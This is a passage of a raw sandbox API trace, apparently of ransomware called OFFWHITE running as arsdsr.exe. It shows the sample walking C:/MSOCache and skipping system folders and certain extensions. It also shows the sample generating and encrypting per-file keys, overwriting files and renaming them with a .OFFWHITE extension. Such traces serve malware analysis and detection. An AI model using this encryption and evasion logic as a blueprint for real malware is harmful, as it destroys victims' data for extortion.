lpBuffer=0x547ba0*, lpNumberOfBytesWritten=0x295e54c*=0x32b, lpOverlapped=0x0) returned 1 [0084.199] GetProcessHeap () returned 0x500000 [0084.199] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x547ba0 | out: hHeap=0x500000) returned 1 [0084.199] CloseHandle (hObject=0x21c) returned 1 [0084.201] GetProcessHeap () returned 0x500000 [0084.201] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.201] GetProcessHeap () returned 0x500000 [0084.201] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.201] GetProcessHeap () returned 0x500000 [0084.201] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.201] GetProcessHeap () returned 0x500000 [0084.201] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.201] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" [0084.201] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.OFFWHITE" [0084.201] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml.offwhite")) returned 1 [0084.202] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0084.202] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0084.202] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\" [0084.202] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.202] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.202] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.202] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.203] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.203] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0084.203] GetProcessHeap () returned 0x500000 [0084.203] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be60 [0084.203] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.204] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=5884) returned 1 [0084.204] GetProcessHeap () returned 0x500000 [0084.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.204] GetProcessHeap () returned 0x500000 [0084.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.204] GetProcessHeap () returned 0x500000 [0084.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.204] GetProcessHeap () returned 0x500000 [0084.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.204] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.204] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.204] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.204] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.204] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.204] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.204] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.204] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.204] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.205] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.205] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.205] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0084.205] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x16fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.205] SetLastError (dwErrCode=0x0) [0084.205] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.218] GetLastError () returned 0x0 [0084.218] GetLastError () returned 0x0 [0084.218] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x17fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0084.219] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x18fc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.219] WriteFile (in: hFile=0x21c, lpBuffer=0x52be60*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52be60*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0084.219] GetProcessHeap () returned 0x500000 [0084.219] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x16fc) returned 0x5517b0 [0084.219] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.219] ReadFile (in: hFile=0x21c, lpBuffer=0x5517b0, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesRead=0x295e540*=0x16fc, lpOverlapped=0x0) returned 1 [0084.220] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.221] WriteFile (in: hFile=0x21c, lpBuffer=0x5517b0*, nNumberOfBytesToWrite=0x16fc, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5517b0*, lpNumberOfBytesWritten=0x295e54c*=0x16fc, lpOverlapped=0x0) returned 1 [0084.221] GetProcessHeap () returned 0x500000 [0084.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5517b0 | out: hHeap=0x500000) returned 1 [0084.221] CloseHandle (hObject=0x21c) returned 1 [0084.222] GetProcessHeap () returned 0x500000 [0084.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0084.222] GetProcessHeap () returned 0x500000 [0084.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0084.222] GetProcessHeap () returned 0x500000 [0084.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0084.222] GetProcessHeap () returned 0x500000 [0084.222] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0084.222] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" [0084.222] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0084.222] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0084.223] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42c75f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x42c75f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58c6830, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x16fc, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0084.223] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0084.223] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0043-0409-1000-0000000FF1CE}-C", cAlternateFileName="{95310~1")) returned 1 [0084.223] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0084.224] lstrcmpiW (lpString1="{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0084.224] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0084.224] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0043-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C" [0084.224] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.224] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.224] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*" [0084.224] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0084.239] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0084.239] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc3e6570, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc3e6570, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0084.239] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0084.239] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0084.239] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5600, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32MUI.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0084.239] lstrcmpiW (lpString1="Office32MUI.msi", lpString2=".") returned 1 [0084.239] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="..") returned 1 [0084.239] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="...") returned 1 [0084.239] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="windows") returned -1 [0084.239] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="$recycle.bin") returned 1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="rsa") returned -1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="ntuser.dat") returned 1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="programdata") returned -1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="appdata") returned 1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="program files") returned -1 [0084.240] lstrcmpiW (lpString1="Office32MUI.msi", lpString2="program files (x86)") returned -1 [0084.240] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.240] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Office32MUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0084.240] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.240] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.240] PathFindExtensionW (pszPath="Office32MUI.msi") returned=".msi" [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0084.240] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0084.241] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0084.241] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0084.241] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0084.241] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2=".") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="..") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="...") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="windows") returned -1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="$recycle.bin") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="rsa") returned -1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="ntuser.dat") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="programdata") returned -1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="appdata") returned 1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="program files") returned -1 [0084.241] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="program files (x86)") returned -1 [0084.241] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\" [0084.241] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\", lpString2="Office32MUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0084.241] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.241] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.241] PathFindExtensionW (pszPath="Office32MUI.xml") returned=".xml" [0084.241] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0084.241] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0084.241] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0084.242] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0084.242] lstrcmpiW (lpString1="Office32MUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0084.242] GetProcessHeap () returned 0x500000 [0084.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be70 [0084.242] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0084.243] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1383) returned 1 [0084.243] GetProcessHeap () returned 0x500000 [0084.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0084.243] GetProcessHeap () returned 0x500000 [0084.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0084.243] GetProcessHeap () returned 0x500000 [0084.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0084.243] GetProcessHeap () returned 0x500000 [0084.243] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0084.243] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.243] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.243] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0084.243] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.243] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.243] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0084.243] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.243] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0084.243] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0084.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0084.244] lstrcmpiW (lpString1="kernel32.dll", 